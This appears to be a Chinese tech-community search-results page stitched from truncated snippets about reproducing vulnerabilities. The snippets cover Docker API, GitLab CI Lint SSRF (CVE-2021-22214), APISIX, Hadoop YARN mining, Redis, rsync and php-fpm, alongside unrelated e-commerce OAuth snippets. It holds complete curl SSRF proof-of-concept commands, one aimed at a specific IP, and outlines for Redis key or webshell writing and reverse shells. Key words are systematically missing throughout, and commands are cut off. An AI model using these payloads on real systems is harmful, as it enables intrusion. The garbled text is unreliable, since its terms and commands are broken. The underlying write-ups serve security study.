展开

关键词

Docker API漏洞复现

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,请勿利用文章中的技术资料对任何计算机系统进行入侵操作。 乌鸦安全拥有对此文章的修改、删除和解释限,如转载或传播此文章,需保证文章的完整性,,不得用于其他。 01 漏洞成因 如果在docker上配置了远程访问,docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制的话,攻击者就可以通过Docker来控制服务器 02 漏洞搭建 05 实战 这里来模拟测试开启Docker API之后,使用密钥登陆受害者机器 5.1 配置Docker支持远程访问 在这里使用我自己的阿里云主机进行测试 首先要配置docker支持远程访问 进行文件备份 5.3 关闭Docker API 将我们的authorized_keys文件删除,将原来的文件复位 rm authorized_keys mv authorized_keys.bak authorized_keys

23520

Apache APISIX Dashboard api 访问

CVE-2021-45232 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。 CVE-2021-45232 该漏洞的存在是由于 Manager API 中的错误。 Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴中间件都是基于 droplet 框架开发的。 但是有些 API 直接使用了框架 gin 的接口,从而绕过身份验证。

32630
  • 广告
    关闭

    什么是世界上最好的编程语言?丨云托管征文活动

    代金券、腾讯视频VIP、QQ音乐VIP、QB、公仔等奖励等你来拿!

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    CVE-2021-22214:Gitlab APISSRF复现

    0x02 漏洞概述 编号:CVE-2021-22214 Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。 攻击者成功利用该漏洞可获得敏感数据的访问限或向其他服务器发送恶意请求。 0x05 漏洞复现 POC为:(使用时修改两处即可) curl -s --show-error -H 'Content-Type: application/json' http://目标ip或者域名/api /v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://dnslog/api/

    1.2K60

    Hadoop Yarn REST API漏洞利用挖矿分析

    一、背景情况 5月5日腾讯云安全曾针对攻击者利用Hadoop Yarn资源管理系统REST API漏洞对服务器进行攻击,攻击者可以在的情况下远程执行代码的安全问题进行预警,在预警的前后我们曾多次捕获相关的攻击案例 YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致访问的问题,那么任何黑客则就均可利用其进行远程命令执行 更多漏洞详情可以参考 http://bbs.qcloud.com/thread-50090-1-1.html 三、入侵分析 在本次分析的案例中,受害机器部署有Hadoop YARN,并且存在访问的安全问题 ,黑客直接利用开放在8088的REST API提交执行命令,来实现在服务器内下载执行.sh脚本,从而再进一步下载启动挖矿程序达到挖矿的目的。 这部分代码是其中比较核心的代码,通过downloadIfNeed方法下载挖矿程序到$DIR目录下并重命名为java,下载w.conf配置文件,给挖矿程序增加执行限,然后以nohup命令后台运行挖矿程序并删除配置文件

    2.9K60

    【漏洞修复】Docker remote api访问复现和修复

    Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供。 docker swarm的时候,管理的docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,http访问会返回 404 page not found ,其实这是 Docker Remote API containers/json 会返回服务器当前运行的 container列表,和在docker CLI上执行 docker ps的效果一样,其他操作比如创建/删除container,拉取image等操作也都可以通过API 调用完成, 0x02 漏洞危害 Docker daemon api是使用url代替命令行来操作docker,docker swarm 是docker下的集群管理工具,在开放2375端口来监听集群容器时 ,会调用这个api,可以执行docker命令,root限启动docker情况下可直接可以控制服务器。

    2.2K60

    追洞计划 | Gitlab CI Lint API SSRF漏洞(CVE-2021-22214)

    CVE-2021-22214 GitLab存在前台SSRF漏洞,的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。 攻击者成功利用该漏洞可获得敏感数据的访问限或向其他服务器发送恶意请求。 ? 13.10.5 三、POC: curl -s --show-error -H 'Content-Type: application/json' https://example.gitlab.com/api lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://xx.xxx.xx.xx:port/api 2、漏洞复现 1)dnslog curl -s --show-error -H 'Content-Type: application/json' http://47.243.37.71/api/v4/

    1K50

    MetersphereRCE

    然后这个时候访问ip:8081端口即可,如果访问的时候提示超时或者其他情况,等待一下就行

    5420

    rsync访问

    rsync访问带来的危害主要有两个:一是造成了严重的信息泄露;二是上传脚本后门文件,远程命令执行。 rsync配置文件 该漏洞最大的隐患在于写限的开启,一旦开启了写限,用户就可以,用户就可以利用该限写马或者写一句话,从而拿到shell。 我们具体来看配置文件的网相关选项(/etc/rsync.conf) 这一项read only表示只读,如果这一项为no,我们就具有写限了。. ? 利用方式 rsync访问漏洞只需使用rsync命令即可进行检测。 渗透测试 红队攻防 免杀 限维持 等等技术 及时分享最新漏洞复现以及EXP 国内外最新技术分享!!!

    52530

    Redis漏洞

    Redis漏洞 Redis 默认配置下绑定在6379,默认开启认证下,导致任意用户访问 Redis 以及读取 Redis 的数据。 攻击者在访问 Redis 的情况下可以利用 Redis 的相关方法,成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。 protected-mode no) 640.png 后台运行(daemonize yes) 640.png 启动redis-server redis-server redis.conf Redis漏洞 使用攻击端连接服务器redis端口 攻击端安装redis apt install redis -y 攻击端连接服务器 redis-cli -h 192.168.42.183 info image.png Redis利用 4、 最小限运行redis,修改Redis服务运行账号 (需要重启redis才能生效),以较低限账号运行Redis服务,并禁用该账号的登录限 参考文章 https://cloud.tencent.com

    1610

    spring boot 访问

    /后面加个env可能有访问,扫描器先放下: ? 访问env目录坐实了该站点存在spring访问漏洞,加下来就是编写payload进行利用。

    1.1K20

    Google JS API 失败

    // 初始化OAuth2.0 const authenticate = () => { return gapi.auth2.getAuthInstance printLog(`Error signing in`) } ) } 代码如上

    10930

    WIKI | 访问的tips

    前人栽树后人乘凉,本文主要是把一些资料依葫芦画瓢学习了下,做了个汇总. 0x00 小二上酒 https://github.com/se55i0n/DBScanner a)Redis访问 b)Jenkins 访问 c)MongoDB访问 d)ZooKeeper访问 e)Elasticsearch访问 f)Memcache访问 g)Hadoop访问 h)CouchDB访问 i)Docker访问 0x01 Redis访问 1.扫描探测 (1). 0x08 CouchDB访问 介绍 CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问 0x09 Docker访问 1. 基础介绍 http://www.loner.fm/drops/##!/drops/1203.

    84740

    CVE-2021-22205 GitLab RCE

    参考: https://hackerone.com/reports/1154542

    50180

    JAVA接入淘宝API

    如果您的应用和淘宝开放平台对接后,需要获取用户隐私信息(如:商品、订单、收藏夹等),为保证用户数据的安全性与隐私性,您的应用需要取得用户的。 在这种情况下,您的应用需要引导用户完成“使用淘宝帐号登录并”的流程。 文档:http://open.taobao.com/doc/detail.htm? client_id=123456&state=155&redirect_uri=http://weixin.frp.kaigejava.com/tbSessionKeyReturnUrl/ 2.根据后回调用 code换取access_token 使用第三方fastJson.jar,淘宝开放sdk.jar /**  * @param access_code 登陆后的code  */ public void (); // w1级别API或字段的访问过期时间 obj.get("w1_expires_in").toString(); // w2级别API或字段的访问过期时间 obj.get("w2_expires_in

    2.4K31

    JAVA接入京东API

    如果您的应用已和京东JOS对接,需要获取一些与用户紧密相关的信息(如订单、商品、促销等),为保证数据的安全性和隐私性,需要取得用户的同意,引导用户。 response_type=code&client_id=京东APPID&redirect_uri=后台设置的回调地址 2.根据后回调用code换取access_token 使用第三方fastJson.jar  * @param access_code 登陆后的code  */ public void get_access_token(String access_code) { StringBuffer ID String uid = obj.getString("uid"); // 用户对应的京东昵称 String user_nick = obj.getString("user_nick "); logger.info(obj.getString("user_nick") + "成功."); } else { // 错误 logger.info("京东错误

    2K30

    JAVA接入苏宁API

    如果您的应用和苏宁开放服务平台对接后,需要获取一些与用户紧密相关的信息(如订单、商品、促销等),为保证数据的安全性和隐私性,需要取得用户的同意,引导用户。 官方说明文档:http://open.suning.com/api/view/devUsrauthintr.htm 1.访问地址:http://open.suning.com/api/oauth // 访问令牌过期时间 obj.getString("expires_in"); // 刷新令牌过期时间  obj.getString("re_expires_in"); // 范围   obj.getString("suning_user_name"); logger.info(obj.getString("suning_user_name").toString() + "成功 ."); } else { // 错误,检查access_code logger.info("错误,请检查access_code"); }  } http://www.xiaojianjian.net

    80830

    Redis访问常见提方式

    Redis在默认情况会将服务绑定在6379端口上,从而将服务暴露在公网环境下,如果在没有开启安全认证的情况下,可以导致任意用户访问Redis服务器并Redis进行读写等操作。 一.物理路径写Webshell 当redis限不高时,并且服务器开着web服务,在redis有web目录写限时,可以尝试往web路径写webshell。 步骤如下: ? 上传成功: ? ? Kali save后 root@kali:~/.ssh# ssh -i id_rsa root@ip 连接 三.执行命令反弹shell 在redis以root限运行时可以写crontab来执行命令反弹

    1.3K20

    ​php-fpm 访问复现

    自己的知识面很窄,感觉原来的学习总是迈不开步子,以至于,自己对linux的很多服务器的配置都很不明确,所以还是得好好学习,折腾环境也是很重要的,来手动的配置一下php-fpm访问的环境。 fastcgi_params; } 配置链接方式 在如下路径的文件 /etc/php/7.0/fpm/pool.d/www.conf listen = 0.0.0.0:9000#为了实现漏洞 访问因此的来

    81830

    访问漏洞总结

    访问漏洞可以理解为需要安全配置或限认证的地址、页面存在缺陷导致其他用户可以直接访问从而引发重要限可被操作、数据库或网站目录等敏感信息泄露。 常见的访问漏洞 1.MongoDB 访问漏洞 2.Redis 访问漏洞 3.Memcached 访问漏洞CVE-2013-7239 4.JBOSS 访问漏洞 5.VNC 访问漏洞 6.Docker 访问漏洞 7.ZooKeeper 访问漏洞 8.Rsync 访问漏洞 一、MongoDB 访问漏洞 漏洞信息 (1) 漏洞简述开启 MongoDB 服务时若不添加任何参数默认是没有限验证的而且可以远程访问数据库登录的用户无需密码即可通过默认端口 在没有开启认证的情况下会导致任意用户在可以访问目标服务器的情况下就访问到 Redis 以及读取 Redis 的数据。 回显 0.0.0.0:1121111211 表示在所有网卡进行监听存在 Memcached 访问漏洞。

    1.2K20

    相关产品

    • 云 API

      云 API

      云 API 是腾讯云开放生态的基石。通过云 API,只需执行对应 API 命令行工具即可快速操作云产品;在熟练的情况下,使用一些频繁使用的功能,使用云 API 可以极大的提高效率;除此之外,通过API可以组合功能,实现更高级的功能,易于自动化, 易于远程调用, 兼容性强,对系统要求低。

    相关资讯

    热门标签

    扫码关注云+社区

    领取腾讯云代金券